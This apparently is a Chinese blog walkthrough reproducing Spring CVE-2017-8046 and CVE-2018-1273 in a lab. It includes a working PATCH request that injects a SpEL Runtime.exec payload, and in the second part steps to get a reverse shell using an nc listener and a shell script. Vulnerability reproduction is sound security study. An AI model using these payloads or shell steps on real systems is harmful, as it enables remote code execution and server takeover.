当前位置: 首页 > news >正文

Spring漏洞再现

news 来源:原创 2025/5/6 22:06:08

一、CVE-2017-8046

1、开环境

2、访问目录

/customers/1

3、在当前页抓包,并修改数据包

PATCH /customers/1 HTTP/1.1
Host: 150.158.199.164:8080
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 200

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]

4、进入容器,查看命令是否执行

查看容器id:docker ps

进入容器:docker exec -it 容器的id /bin/base

输入命令ls /tmp

二、CVE-2018-1273

1、开环境

2、访问目录

/users

3、抓包

填写注册信息,抓包

修改信息

4、进入容器执行命令

5、反弹shell

在服务器写一个shell文件

让靶机执行脚本

开启监听,并执行脚本

开启监听:nc -lvvp 6666

执行脚本:/bin/bash /tmp/shell.sh

成功监听

相关文章:

  • 卷积神经网络 - 关于LeNet-5的若干问题的解释
  • 【机器学习/大模型/八股文 面经 (一)】
  • 深度学习技术与应用的未来展望:从基础理论到实际实现
  • Spark Driver生成过程详解
  • Pyecharts功能详解与实战示例
  • CCF编程能力等级认证GESP—C++4级—20250322
  • 传统复古怀旧标签标识Logo设计PSAI无衬线英文字体安装包 Myfonts – Hebden Recut Font Family
  • 「DP」专题训练(持续更新中)
  • 基于linuxC结合epoll + TCP 服务器客户端 + 数据库实现一个注册登录功能
  • 在IDEA中快速注释所有console.log
  • 四种跨模态行人重识别可视化方法
  • Ubuntu22.04搭建freeradius操作说明
  • 实时图像处理:让你的应用更智能
  • 【Bug记录】node-sass安装失败解决方案
  • Thinkphp(TP)框架漏洞攻略
  • Docker 可视化工具 Portainer
  • 【2025】基于springboot+spark的电影推荐系统(源码、万字文档、图文修改、调试答疑)
  • 【Tomcat】部署及优化
  • 阿里云国际站代理商:怎样针对4G/5G网络优化CDN参数?
  • Pyserial库使用
  • 深圳一购房者交首付后迟迟无法签合同,澎湃介入后开发商承诺退款
  • 许昌市场监管部门对胖东来玉石开展日常检查:平均毛利率不超20%
  • 外交部亚洲司司长刘劲松就日本民用飞机侵闯我钓鱼岛领空向日方提出严正交涉
  • 世锦赛决赛今夜打响,斯诺克运动需要赵心童创造历史
  • 德雷克海峡发生6.4级地震,震源深度10千米
  • 图忆|上海车展40年:中国人的梦中情车有哪些变化(下)